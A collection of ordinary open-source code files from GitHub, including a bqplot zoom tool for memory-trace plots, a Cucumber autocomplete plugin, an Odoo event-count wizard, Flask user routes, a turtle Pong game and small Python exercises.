[self.scale_y]})\n self.zoom_brush = self.zoom_brush_full\n\n tool_actions_map[PAN_ZOOM] = self.panzoom\n tool_actions_map[ZOOM_SELECT] = self.zoom_brush\n\n # Update immediately if in PAN_ZOOM mode\n name = self.tool_actions[self.interaction_tooltips.v_model]\n if name == PAN_ZOOM:\n self.figure.interaction = self.panzoom\n elif name == ZOOM_SELECT:\n self.figure.interaction = self.zoom_brush\n \n\n self.control_x.observe(axis_lock_update)\n self.control_y.observe(axis_lock_update)\n self.axis_controls = 
widgets.VBox([self.control_x,self.control_y])\n\n self.tooltips = v.Row(children=[\n self.axis_controls, \n self.interaction_tooltips, \n self.reset_tooltip,\n self.undo_tooltip,\n self.redo_tooltip,\n self.screenshot_tooltip\n ], align='center', justify='center')\n self.plot.add_to_toolbar(self.tooltips)\n\n def get_df_selection(self, x1, x2, y1, y2):\n ind = self.plot.x_col\n addr = self.plot.y_col\n df = self.dataset\n return df[(df[ind] >= x1) & (df[ind] <= x2) & (df[addr] >= y1) & (df[addr] <= y2)]\n\n def update_zoom_brush_full(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (x1, y1), (x2, y2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected_x = None\n self.zoom_brush.selected_y = None\n\n self.zoom_sel(x1, x2, y1, y2, smart_zoom=True, padding=True)\n\n def update_zoom_brush_horizontal(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (x1, x2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n\n self.zoom_sel(x1, x2, None, None, smart_zoom=False, padding=False)\n\n def update_zoom_brush_vertical(self, *args):\n with self.output:\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = None\n if self.zoom_brush.selected is not None:\n (y1, y2) = self.zoom_brush.selected\n if not self.zoom_brush.brushing: # Update on mouse up\n self.figure.interaction = self.zoom_brush\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n self.zoom_sel(None, None, y1, y2, smart_zoom=False, padding=False)\n\n def measure_selected_area(self, *args):\n with self.output:\n if not self.ruler.brushing: # Update on mouse up\n pass\n if self.ruler.selected is not None:\n (x1, y1), (x2, y2) = self.ruler.selected\n if not self.ruler.brushing: # Update on mouse up\n self.figure.interaction = self.ruler\n with self.ruler.hold_trait_notifications(): # Delete selection\n self.ruler.selected_x = None\n self.ruler.selected_y = None\n df = self.get_df_selection(x1, x2, y1, y2)\n\n uniqueCacheLines = {l >> int(np.log2(self.plot.model.curr_trace.cache_block)) for l in df.unique('Address')}\n self.plot.model.legend.mearsurement.update(y2-y1, len(uniqueCacheLines), df.count(), df)\n \n\n def update_zoom_brush_none(self, *args):\n with self.zoom_brush.hold_trait_notifications(): # Delete selection\n self.zoom_brush.selected = None\n\n def zoom_sel(self, x1, x2, y1, y2, smart_zoom=False, padding=False):\n #################### handle locked x or y axis ########################\n # dont zoom if both axes are locked\n if self.control_x.value == True and self.control_y.value == True:\n return\n # if either x axis or y axis is locked, set the coresponding x12 or y12 coords to\n # the current axis size so it doesn't zoom \n if self.control_x.value == True:\n smart_zoom = False\n padding = False\n x1 = self.scale_x.min\n x2 = self.scale_x.max\n if self.control_y.value == True:\n smart_zoom = False\n padding = False\n y1 = self.scale_y.min\n y2 = self.scale_y.max\n 
####################################################################### \n\n df = self.get_df_selection(x1, x2, y1, y2)\n\n if df.count() != 0:\n selection = self.plot.model.legend.get_select_string()\n if selection != \"\":\n df = df[df[selection]]\n\n if df.count() == 0:\n self.stuck_ctr+=1\n with self.output:\n self.output.clear_output()\n print(f\"{WARNING_LABEL} {TextStyle.YELLOW}No accesses in selection{'!'*self.stuck_ctr}{TextStyle.END}\")\n return\n\n if smart_zoom: # For reset and zoom to selection\n ind = self.plot.x_col\n addr = self.plot.y_col\n x1 = df[ind].values[0]\n x2 = df[ind].values[-1]+1 # To fix resets on single values + to match original limits\n y1 = df[addr].min()[()]\n y2 = df[addr].max()[()]+1\n\n\n if padding: # Fix for plot getting stuck at one value axis\n if (x2 - x1 < 128):\n x1 -= (128 + x1 - x2) / 2\n x2 = x1 + 128\n\n if (y2 - y1 < 128):\n y1 -= (128 + y1 - y2) / 2\n y2 = y1 + 128\n \n # Add a 5% padding so points are not directly on edge\n padding_x = (x2 - x1) * 0.05\n padding_y = (y2 - y1) * 0.05\n\n x1 = x1 - padding_x\n x2 = x2 + padding_x\n y1 = y1 - padding_y\n y2 = y2 + padding_y\n\n with self.scale_x.hold_trait_notifications():\n self.scale_x.min, self.scale_x.max = float(x1), float(x2)\n with self.scale_y.hold_trait_notifications():\n self.scale_y.min, self.scale_y.max = float(y1), float(y2)\n\n def click_to_zoom(self, _, target):\n '''\n click to zoom call back \n target contains mouse coordinates\n '''\n # check whether we want to zoom in or out\n tool_name = self.tool_actions[self.interaction_tooltips.v_model]\n if tool_name == CLICK_ZOOM_IN:\n scale = CLICK_ZOOM_SCALE\n use_smart_zoom = True\n use_padding = True\n elif tool_name == CLICK_ZOOM_OUT:\n scale = CLICK_ZOOM_SCALE * 100\n use_smart_zoom = False\n use_padding = False\n else:\n print('Invalid Tool Selected')\n return\n\n\n # get the mouse coordinates\n x = target['data']['click_x']\n y = target['data']['click_y']\n\n # difference smallest and largest value on each axis\n x_diff = abs(self.scale_x.max - self.scale_x.min)\n y_diff = abs(self.scale_y.max - self.scale_y.min)\n # multiply diff by CLICK_ZOOM_SCALE for 10x zoom, and by 0.5 since we want to\n # create a box around the x y mouse coord.\n x1 = x - (0.5 * scale * x_diff)\n x2 = x + (0.5 * scale * x_diff)\n y1 = y - (0.5 * scale * y_diff)\n y2 = y + (0.5 * scale * y_diff)\n\n self.zoom_sel(float(x1), float(x2), float(y1), float(y2),\n smart_zoom=use_smart_zoom, padding=use_padding) \n\n def zoom_args_string(self):\n to_int = [tuple( map(int,i) ) for i in self.limits]\n return f'zoom_access={to_int[0]}, zoom_address={to_int[1]}'\n","repo_name":"NVSL/CSE141pp-Tool-Moneta","sub_path":"moneta/moneta/vaextended/bqplot.py","file_name":"bqplot.py","file_ext":"py","file_size_in_byte":26107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"17282018735","text":"import os\nimport csv\n\ndef create_annotation():\n \n '''\n Функция, которая создает аннотации(annotations.csv) для dataset\n '''\n\n dataset_path = os.path.abspath(\"dataset\")\n\n with open('annotations.csv', 'w') as file:\n writer = csv.writer(file)\n for root, dirs, files in os.walk(dataset_path):\n for filename in files:\n absolute_path = os.path.abspath(os.path.join(root, filename))\n relative_path = os.path.relpath(absolute_path)\n class_name = os.path.basename(os.path.dirname(absolute_path))\n writer.writerow([absolute_path, relative_path, class_name])\n \n\n\ndef main():\n create_annotation()\n\nif __name__ == 
\"__main__\":\n main()","repo_name":"Amirprogrammer689/PP-v5","sub_path":"create_annotation.py","file_name":"create_annotation.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1188464180","text":"palabra = input(\"Ingrese una palabra: \")\n\npalindromo = palabra[::-1]\nvalidador = 0\n\nfor letra1,letra2 in zip(palabra,palindromo):\n if letra1 != letra2:\n validador = 1\n break\nif validador == 0:\n print(\"La palabra es un palindromo\")\nelse:\n print(\"La palabra no es un palindromo\")\n","repo_name":"lmoreno98/100DaysOfCode","sub_path":"Python_Practice_guide/Tuple_List/Ejercicio8.py","file_name":"Ejercicio8.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72914397536","text":"#!/usr/bin/env python\n################################################################################\n# Cucumber support for codeintel.\n################################################################################\nimport os\nimport sys\nimport logging\n\nfrom codeintel2.common import *\nfrom codeintel2.citadel import CitadelBuffer\nfrom codeintel2.langintel import LangIntel\nfrom codeintel2.udl import UDLBuffer, UDLCILEDriver, UDLLexer\nfrom codeintel2.util import CompareNPunctLast\n\nfrom SilverCity.ScintillaConstants import (\n SCE_UDL_SSL_DEFAULT, SCE_UDL_SSL_IDENTIFIER,\n SCE_UDL_SSL_OPERATOR, SCE_UDL_SSL_VARIABLE, SCE_UDL_SSL_WORD,\n)\n\ntry:\n from xpcom.server import UnwrapObject\n _xpcom_ = True\nexcept ImportError:\n _xpcom_ = False\n################################################################################\nlang = \"Cucumber\"\nlog = logging.getLogger(\"codeintel.cucumber\")\n#log.setLevel(logging.DEBUG)\n\n# These keywords are copied from \"cucumber-mainlex.udl\"\n# ** Be sure to keep both of them in sync. **\nkeywords = [\n 'Feature:', 'Background:', 'Scenario:', 'Scenario Outline:', 'Given', 'When',\n 'Then', 'And', 'But', 'Examples:', '*'\n]\n################################################################################\nclass CucumberLexer(UDLLexer):\n lang = lang\n################################################################################\nclass CucumberLangIntel(LangIntel):\n lang = lang\n \n ############################################################################\n # IMPLICIT codeintel triggering event, i.e. when typing in the editor.\n #\n # @param buf {components.interfaces.koICodeIntelBuffer}\n # @param pos {int} The cursor position in the editor/text.\n # @param implicit {bool} Automatically called, else manually called?\n ############################################################################\n def trg_from_pos(self, buf, pos, implicit=True, DEBUG=False, ac=None):\n if pos < 1:\n return None\n\n accessor = buf.accessor\n last_pos = pos-1\n char = accessor.char_at_pos(last_pos)\n style = accessor.style_at_pos(last_pos)\n if char == '@':\n return Trigger(self.lang, TRG_FORM_CPLN, \"tags\", pos, implicit)\n elif char == '<':\n return Trigger(self.lang, TRG_FORM_CPLN, \"placeholders\", pos-1, implicit)\n elif char.isupper():\n prefix = char\n for word in keywords:\n if word.startswith(prefix):\n return Trigger(self.lang, TRG_FORM_CPLN, \"keywords\",\n pos-1, implicit, kw_prefix=prefix)\n\n return None\n ############################################################################\n # EXPLICIT triggering event, i.e. 
Ctrl+J.\n #\n # @param buf {components.interfaces.koICodeIntelBuffer}\n # @param pos {int} The cursor position in the editor/text.\n # @param implicit {bool} Automatically called, else manually called?\n ############################################################################\n def preceding_trg_from_pos(self, buf, pos, curr_pos,\n preceding_trg_terminators=None, DEBUG=False):\n if pos < 1:\n return None\n\n accessor = buf.accessor\n last_pos = pos-1\n char = accessor.char_at_pos(last_pos)\n style = accessor.style_at_pos(last_pos)\n if char == '@':\n return Trigger(self.lang, TRG_FORM_CPLN, \"tags\", pos, implicit=False)\n elif char == '<':\n return Trigger(self.lang, TRG_FORM_CPLN, \"placeholders\",\n pos-1, implicit=False)\n elif char.isupper():\n prefix = char\n for word in keywords:\n if word.startswith(prefix):\n return Trigger(self.lang, TRG_FORM_CPLN, \"keywords\",\n pos-1, implicit=False, kw_prefix=prefix)\n\n return None\n ############################################################################\n # Provide the list of completions or the calltip string.\n # Completions are a list of tuple (type, name) items.\n #\n # Note: This example is *not* asynchronous.\n ############################################################################\n def async_eval_at_trg(self, buf, trg, ctlr):\n if _xpcom_:\n trg = UnwrapObject(trg)\n ctlr = UnwrapObject(ctlr)\n pos = trg.pos\n ctlr.start(buf, trg)\n\n if trg.id == (self.lang, TRG_FORM_CPLN, \"placeholders\"):\n ctlr.set_cplns(self._get_all_placeholders_in_buffer(buf, pos))\n ctlr.done(\"success\")\n return\n \n if trg.id == (self.lang, TRG_FORM_CPLN, \"tags\"):\n ctlr.set_cplns(self._get_all_tags_in_buffer(buf, pos))\n ctlr.done(\"success\")\n return\n\n if trg.id == (self.lang, TRG_FORM_CPLN, \"keywords\"):\n kw_prefix = trg.extra.get(\"kw_prefix\")\n cplns = [x for x in keywords if x.startswith(kw_prefix)]\n cplns = [(\"keyword\", x) for x in sorted(cplns, cmp=CompareNPunctLast)]\n ctlr.set_cplns(cplns)\n ctlr.done(\"success\")\n return\n\n ctlr.error(\"Unknown trigger type: %r\" % (trg, ))\n ctlr.done(\"error\")\n ############################################################################\n def _get_all_placeholders_in_buffer(self, buf, pos):\n all_placeholders = set()\n for token in buf.accessor.gen_tokens():\n if token.get('start_index') == pos: continue\n if token.get('text')[0] == '<':\n all_placeholders.add(token.get('text'))\n return [(\"variable\", x) for x in sorted(all_placeholders, cmp=CompareNPunctLast)]\n ############################################################################\n def _get_all_tags_in_buffer(self, buf, pos):\n all_tags = set()\n for token in buf.accessor.gen_tokens():\n if token.get('start_index') == pos-1: continue\n if token.get('text')[0] == '@':\n all_tags.add(token.get('text')[1:])\n return [(\"identifier\", x) for x in sorted(all_tags, cmp=CompareNPunctLast)]\n################################################################################\nclass CucumberBuffer(UDLBuffer):\n lang = lang\n ssl_lang = \"Cucumber\"\n\n cb_show_if_empty = True\n\n # Close the completion dialog when encountering any of these chars.\n cpln_stop_chars = \" ()*-=+<>{}[]^&|;:'\\\",.?~`!@#%\\\\/\"\n################################################################################\nclass CucumberCILEDriver(UDLCILEDriver):\n lang = lang\n\n def scan_purelang(self, buf):\n import cile_cucumber\n return cile_cucumber.scan_buf(buf)\n################################################################################\ndef 
register(mgr):\n \"\"\"Register language support with the Manager.\"\"\"\n mgr.set_lang_info(\n lang,\n silvercity_lexer=CucumberLexer(),\n buf_class=CucumberBuffer,\n langintel_class=CucumberLangIntel,\n import_handler_class=None,\n cile_driver_class=CucumberCILEDriver,\n # Dev Note: set to false if this language does not support\n # autocomplete/calltips.\n is_cpln_lang=True)\n","repo_name":"ccaroon/cucumber_language","sub_path":"pylib/codeintel_cucumber.py","file_name":"codeintel_cucumber.py","file_ext":"py","file_size_in_byte":7282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"74664486178","text":"a = int(input())\r\nb = int(input())\r\nc = int(input())\r\n\r\nif (c < 0):\r\n print ('NO SOLUTION')\r\nelse:\r\n c *= c\r\n c -= b\r\n if (a == 0 and c == 0):\r\n print('MANY SOLUTIONS')\r\n elif (a == 0 and c != 0):\r\n print ('NO SOLUTION')\r\n elif (c % a == 0):\r\n print(c // a)\r\n else:\r\n print('NO SOLUTION')\r\n","repo_name":"dashkazaitseva/yandex.traning","sub_path":"2 июня. Тестирование/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1346434564","text":"from turtle import Turtle\nfrom random import randint\nBALL_COLOR = 'white'\nMAX_MIN_WIDTH = 400\nMAX_MIN_HEIGHT = 300\nrandheading = randint(0, 360)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super(Ball, self).__init__()\n self.create_middle_line()\n self.color(BALL_COLOR)\n self.shape('circle')\n self.penup()\n\n def ball_move(self, paddle1, paddle2):\n global randheading\n if self.pos()[1] >= MAX_MIN_HEIGHT or self.pos()[1] <= -MAX_MIN_HEIGHT:\n randheading = -randheading\n self.setheading(randheading)\n if paddle1.distance(self) < 51 and self.pos()[0] <= 360:\n randheading = -randheading\n self.setheading(randheading)\n elif paddle2.distance(self) < 51 and self.pos()[0] > -360:\n randheading = -randheading\n self.setheading(randheading)\n else:\n self.setheading(randheading)\n self.fd(20)\n\n def bounce_x(self):\n self.setposition(-self.xcor(), self.ycor())\n\n def create_middle_line(self):\n line = Turtle()\n line.hideturtle()\n line.penup()\n line.color(BALL_COLOR)\n line.goto(0, 300)\n line.setheading(270)\n line.pendown()\n while line.pos()[1] >= -300:\n line.fd(20)\n line.penup()\n line.fd(20)\n line.pendown()\n\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-22-Pong/PongGame/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22347538943","text":"import time\nimport datetime\nimport base64\nfrom xlwt import *\n\nfrom openerp import tools\nfrom openerp import models, fields, api, _\n\nclass extract_site_count(models.TransientModel):\n _name = 'extract.site.count'\n \n from_count = fields.Date(string='From', required=True)\n to = fields.Date(string='To', required=True)\n user_id = fields.Many2one('res.users', string='Site User', required=True)\n \n @api.multi\n def get_file(self):\n obj_event = self.env['event.event']\n obj_registration = self.env['event.registration']\n\n wb1 = Workbook()\n ws1 = wb1.add_sheet('Count of Site Registrations by Event')\n ws1.write(0, 0, 'event_id')\n ws1.write(0, 1, 'event_name')\n ws1.write(0, 2, 'count_site')\n ws1.write(0, 3, 'count_total')\n line = 1\n\n # extract all events between the two given dates\n events = obj_event.search([('date_begin', '>=', 
self.from_count), ('date_begin', '<=', self.to)])\n        if events:\n#            events = obj_event.browse(event_ids)\n            sentence = \"\"\"SELECT count(event_id), event_id\n                          FROM event_registration as reg, crm_case as crm \n                          WHERE reg.event_id in (%s) \n                            AND (crm.state = 'open' OR crm.state = 'done')\n                            AND reg.create_uid = %s\n                            AND reg.case_id = crm.id\n                          GROUP BY event_id\"\"\" % (','.join([str(x.id) for x in events]),\n                            str(self.user_id.id))\n            self.env.cr.execute(sentence)\n            count_site = {}\n            count_total = {}\n            for event_id in events:\n                count_site[event_id.id] = 0\n                count_total[event_id.id] = 0\n            res = self.env.cr.fetchall()\n            for count in res:\n                count_site[count[1]] = count[0]\n            sentence = \"\"\"SELECT count(event_id), event_id\n                          FROM event_registration as reg, crm_case as crm \n                          WHERE reg.event_id in (%s) \n                            AND (crm.state = 'open' OR crm.state = 'done')\n                            AND reg.case_id = crm.id\n                          GROUP BY event_id\"\"\" % (','.join([str(x) for x in events.ids]))\n            self.env.cr.execute(sentence)\n            res = self.env.cr.fetchall()\n            for count in res:\n                count_total[count[1]] = count[0]\n            for event in events:\n                ws1.write(line, 0, event.id)\n                ws1.write(line, 1, event.name or 'inconnu')\n                ws1.write(line, 2, count_site[event.id])\n                ws1.write(line, 3, count_total[event.id])\n                line += 1\n            wb1.save('site_counting.xls')\n            result_file = open('site_counting.xls', 'rb').read()\n\n            # give the result to the user\n            msg = 'Save the File with '\".xls\"' extension.'\n            site_counting_xls = base64.encodestring(result_file)\n        else:\n            wb1.save('site_counting.xls')\n            result_file = open('site_counting.xls', 'rb').read()\n            msg = 'No events between these two dates.'\n            site_counting_xls = base64.encodestring(result_file)\n        \n        ctx = self.env.context.copy()\n        ctx.update({'msg': msg, 'site_counting_xls': site_counting_xls, 'name': 'site_counting.xls'})\n        \n        resource = self.env.ref('cci_event_extend.cci_extract_site_count_msg_view')\n        return {\n            'name': 'Notification',\n            'view_type': 'form',\n            'view_mode': 'form',\n            'res_model': 'extract.site.count.msg',\n            'views': [(resource.id, 'form')],\n            'context': ctx,\n            'type': 'ir.actions.act_window',\n            'target': 'new',\n        }\n\nclass extract_site_count_msg(models.TransientModel):\n    _name = 'extract.site.count.msg'\n    \n    name = fields.Char('Name')\n    msg = fields.Text('File created', size=100, readonly=True)\n    site_counting_xls = fields.Binary('Prepared file', readonly=True)\n    \n    @api.model\n    def default_get(self, fields):\n        res = super(extract_site_count_msg, self).default_get(fields)\n        if 'name' in self.env.context:\n            res.update({'name': self.env.context['name']})\n        if 'msg' in self.env.context:\n            res.update({'msg': self.env.context['msg']})\n        if 'site_counting_xls' in self.env.context:\n            res.update({'site_counting_xls': self.env.context['site_counting_xls']})\n        return res\n    \n","repo_name":"philmervdm/modules_cci_odoo8","sub_path":"cci_event_extend/wizard/extract_site_count.py","file_name":"extract_site_count.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} {"seq_id":"21633158288","text":"from flask import Blueprint, render_template, jsonify, request, send_from_directory, redirect, url_for\n\nfrom flask_jwt import jwt_required, current_identity\nfrom flask import Flask,flash\nfrom flask_login import LoginManager, current_user, login_required, login_user\nfrom datetime import datetime\n \nfrom App.models import *\n\nfrom App.controllers import *\n\nuser_views = Blueprint('user_views', __name__, 
template_folder='../templates')\n\n\n@user_views.route('/users', methods=['GET'])\ndef get_current_user():\n    return jsonify(\n        {\n            \"userId\" : current_user.id,\n            \"username\": current_user.username,\n        }\n    )\n\n\n# for UI\n@user_views.route('/allUsers', methods=['GET'])\ndef get_user_page():\n    users = get_all_users()\n    return render_template('users.html', users=users)\n\n@user_views.route('/api/profile', methods=['GET'])\ndef view_profile():\n    return render_template('profile.html',user=current_user)\n\n\n\n@user_views.route('/api/profile/<int:userID>', methods=['GET'])\ndef view_profile_from_id(userID):\n    user = get_user(userID)\n    return render_template('profile.html',user=user)\n\n\n\n@user_views.route('/api/users', methods=['POST'])\n@jwt_required()\ndef create_user_action():\n    data = request.json\n    user = getUserbyUsername(data['username'])\n    if user:\n        return jsonify({\"message\":\"Username Already Taken\"}), 400\n    user = create_user(data[\"username\"], data[\"password\"])\n    if user:\n        distribute_all()\n        return jsonify({\"message\": \"User Created\"}), 201\n    return jsonify({\"message\":\"User not Created\"}), 400\n\n@user_views.route('/api/users', methods=['GET'])\n@jwt_required()\ndef get_all_users_action():\n    users = get_all_users_json()\n    if users:\n        return jsonify(users), 200\n    return jsonify({\"message\": \"There were no users found.\"}), 404\n\n@user_views.route('/api/users/<int:id>', methods=['GET'])\n@jwt_required()\ndef get_user_action(id):\n    user = get_user(id)\n    if user:\n        return jsonify(get_user_json(id)),200\n    return jsonify({\"message\":\"User Not Found\"}), 404\n\n@user_views.route('/api/users/<int:id>/info', methods=['GET'])\n@jwt_required()\ndef get_user_details_action(id):\n    user = get_user(id)\n    if user:\n        details = {\n            \"id\": user.getId(),\n            \"username\": user.getUsername(),\n            \"images\": getImagesByUser_JSON(user.getId()),\n            \"average_rate\": get_average_rate_by_ratee(user.getId()),\n            \"ratings_completed\": get_ratings_by_ratee_json(user.getId())\n        }\n        return jsonify(details),200\n    return jsonify({\"message\":\"User Not Found\"}), 404\n\n\n@user_views.route('/api/users/<int:id>', methods=['DELETE'])\n@jwt_required()\ndef delete_user_action(id):\n    user = get_user(id)\n    if user:\n        delete_user(id)\n        return jsonify({\"message\":\"User Deleted\"}) , 200\n    return jsonify({\"message\":\"User Not Found\"}) , 404\n\n#login routes\n@user_views.route('/login',methods=['GET'])\ndef getLoginPage():\n    return render_template('login.html')\n\n@user_views.route('/login',methods=['POST'])\ndef loginAction():\n    data=request.form\n    permittedUser=authenticate(data['username'], data['password'])\n    if permittedUser==None:\n        flash(\"Wrong Credentials, Please try again\")\n        return render_template('login.html')\n    login_user(permittedUser,remember=True)\n    flash('You were successfully logged in!')\n    return render_template('profile.html',user=current_user)\n\n#signup routes\n@user_views.route('/signup',methods=['GET'])\ndef getSignUpPage():\n    return render_template('signup.html')\n\n@user_views.route('/signup',methods=['POST'])\ndef signupAction():\n    data = request.form\n    user = getUserbyUsername(data['username'])\n    if user:\n        flash(\"Username taken please try a new username\")\n        return render_template('signup.html')\n    user = create_user(data['username'], data['password'])\n    return render_template('login.html')\n\n#route for viewing a user's profile\n@user_views.route('/viewUserProfile/<int:userId>', methods=['GET'])\n@login_required\ndef viewProfile(userId):\n    user=get_user(userId)\n    result = view_feed(current_user.id, userId)\n    
images=get_images_by_userid(userId)\n images = [image.toJSON() for image in images]\n values=get_user_image_count(userId)\n total_rating=get_calculated_rating(userId)\n if user:\n return render_template('profilePage.html',user=user,images=images,rating_info=total_rating,values=values)\n return redirect(url_for('distributer_views.view_profiles_again'))\n","repo_name":"theWebWizards/profilepictureranking","sub_path":"App/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7480032550","text":"import pandas as pd\n\n# Define the graph structure as a list of tuples\nsteps = [\n ('A', 'Set the DRP into motion after a disaster has been declared'),\n ('B', 'Determine the magnitude of the disaster'),\n ('C', 'Determine what systems and processes have been affected by the disaster'),\n ('D', 'Communicate the disaster to the other disaster recovery team members'),\n ('E', 'Determine what first steps need to be taken by the disaster recovery teams'),\n ('F', 'Keep the disaster recovery teams on track with pre-determined expectations and goals'),\n ('G', 'Keep a record of money spent during the disaster recovery process'),\n ('H', 'Ensure that all decisions made abide by the DRP and policies set by the company'),\n ('I', 'Ensure that the secondary site is fully functional and secure'),\n ('J', 'Create a detailed report of all the steps undertaken in the disaster recovery process'),\n ('K', 'Notify the relevant parties once the disaster is over and normal business functionality has been restored')\n]\n\n# Create a Pandas DataFrame from the graph structure\nsteps_df = pd.DataFrame(steps, columns=['Task ID', 'Task Description'])\n\n# Define the graph structure as a list of tuples\nfunctions = [\n ('A', 'Disaster identification and declaration', 'B', 'Disaster Recovery Policy DRP activation'),\n ('B', 'Disaster Recovery Policy DRP activation', 'C', 'Assessment of damage'),\n ('C', 'Assessment of damage', 'D', 'Establish IT operations'),\n ('D', 'Establish IT operations', 'E', 'Failover Site activation'),\n ('E', 'Failover Site activation', 'F', 'Communicating the disaster'),\n ('F', 'Communicating the disaster', 'Fa', 'Internal Client Communication'),\n ('F', 'Communicating the disaster', 'Fb', 'Communication with media including social networks')\n]\n\n# Create a Pandas DataFrame from the graph structure\nfunctions_df = pd.DataFrame(functions, columns=['From Node', 'From Description', 'To Node', 'To Description'])\n\n\nimport pandas as pd\n\n# Define the graph structure as a list of tuples\nroles = [\n ('A', 'Facilitator', 'B', 'Exercise Participants'),\n ('B', 'Exercise Participants', 'C', 'IT Team'),\n ('B', 'Exercise Participants', 'D', 'Management'),\n ('E', 'System Failure', 'F', 'Detection'),\n ('F', 'Detection', 'G', 'Assessment?'),\n ('G', 'Assessment?', 'H', 'Resolution? (Yes)'),\n ('G', 'Assessment?', 'I', 'Communication (No)'),\n ('I', 'Communication (No)', 'F', 'Detection (Loop)'),\n ('H', 'Resolution? (Yes)', 'J', 'Recovery (Yes)'),\n ('H', 'Resolution? 
(Yes)', 'K', 'Communication (No)'),\n ('K', 'Communication (No)', 'F', 'Detection (Loop)'),\n ('J', 'Recovery (Yes)', 'L', 'After-Action Review'),\n ('M', 'Incident Report', 'N', 'Timeline'),\n ('M', 'Incident Report', 'O', 'Logs'),\n ('O', 'Logs', 'P', 'Anomalies Detected?'),\n ('P', 'Anomalies Detected?', 'Q', 'Root Cause Analysis (Yes)'),\n ('P', 'Anomalies Detected?', 'R', 'Communication (No)'),\n ('S', 'Internal', 'T', 'External'),\n ('T', 'External', 'U', 'Public Disclosure?'),\n ('U', 'Public Disclosure?', 'V', 'PR Response (Yes)'),\n ('U', 'Public Disclosure?', 'W', 'Legal (No)'),\n ('X', 'Evaluation', 'Y', 'Lessons Learned'),\n ('Y', 'Lessons Learned', 'Z', 'Improvements'),\n ('C', 'IT Team', 'E', 'System Failure'),\n ('D', 'Management', 'I', 'Communication'),\n ('I', 'Communication', 'K', 'Communication'),\n ('J', 'Recovery', 'X', 'Evaluation'),\n ('N', 'Timeline', 'R', 'Communication'),\n ('R', 'Communication', 'S', 'Internal'),\n ('Z', 'Improvements', 'C', 'IT Team')\n]\n\n# Create a Pandas DataFrame from the graph structure\nroles_df = pd.DataFrame(roles, columns=['From Node', 'From Description', 'To Node', 'To Description'])\n\n\n# Function to filter and display a DataFrame\ndef filter_and_display(df):\n while True:\n print(\"\\nFilter Options:\")\n print(\"1. Filter by column value\")\n print(\"2. Exit\")\n choice = input(\"Enter your choice: \")\n\n if choice == '1':\n print(\"\\nAvailable columns:\")\n for col in df.columns:\n print(col)\n column_name = input(\"Enter the column name to filter: \")\n filter_value = input(\"Enter the filter value: \")\n filtered_df = df[df[column_name] == filter_value]\n print(\"\\nFiltered DataFrame:\")\n print(filtered_df)\n elif choice == '2':\n break\n else:\n print(\"Invalid choice. Please select a valid option.\")\n\n# Allow the user to choose which DataFrame to filter\nwhile True:\n print(\"\\nChoose a DataFrame to filter:\")\n print(\"1. Steps\")\n print(\"2. Functions\")\n print(\"3. Roles\")\n print(\"4. Exit\")\n data_frame_choice = input(\"Enter your choice: \")\n\n if data_frame_choice == '1':\n filter_and_display(steps_df)\n elif data_frame_choice == '2':\n filter_and_display(functions_df)\n elif data_frame_choice == '3':\n filter_and_display(roles_df)\n elif data_frame_choice == '4':\n break\n else:\n print(\"Invalid choice. 
Please select a valid option.\")\n\n\n\n\n\n\n","repo_name":"green-dino/TTX","sub_path":"utils/disaster_recovery.py","file_name":"disaster_recovery.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"6595673622","text":"import pandas as pd\nimport os.path as path\n\n\ndef set_pandas_option():\n pd.set_option('display.max_columns', None)\n pd.set_option('display.max_rows', None)\n pd.set_option('display.width', 10000)\n pd.set_option('max_colwidth', 100)\n\n\ndef compress_read(f) -> pd.DataFrame:\n parquet_file = f.replace('.csv', '.parquet')\n if str(f).endswith('.csv') and path.exists(f):\n pd.read_csv(f).to_parquet(parquet_file, compression='brotli')\n return pd.read_parquet(parquet_file)\n\n\ndef df_statistic(df: pd.DataFrame) -> pd.DataFrame:\n stats = []\n for col in df.columns:\n stats.append({\n 'Feature': col,\n 'Type': df[col].dtype,\n 'Unique Values': df[col].nunique(),\n 'Not Null Count': df.shape[0] - df[col].isnull().sum(),\n 'Null Value Percentage': df[col].isnull().sum() * 100.0 / df.shape[0],\n 'Biggest Category Percentage': df[col].value_counts(normalize=True, dropna=False).values[0] * 100.0\n })\n return pd.DataFrame(stats)\n\n\ndef df_hist(df: pd.DataFrame):\n import matplotlib.pyplot as plt\n df.hist(bins=50, figsize=(20, 15), column=5)\n plt.savefig('plots/hist.png', dpi=600)\n 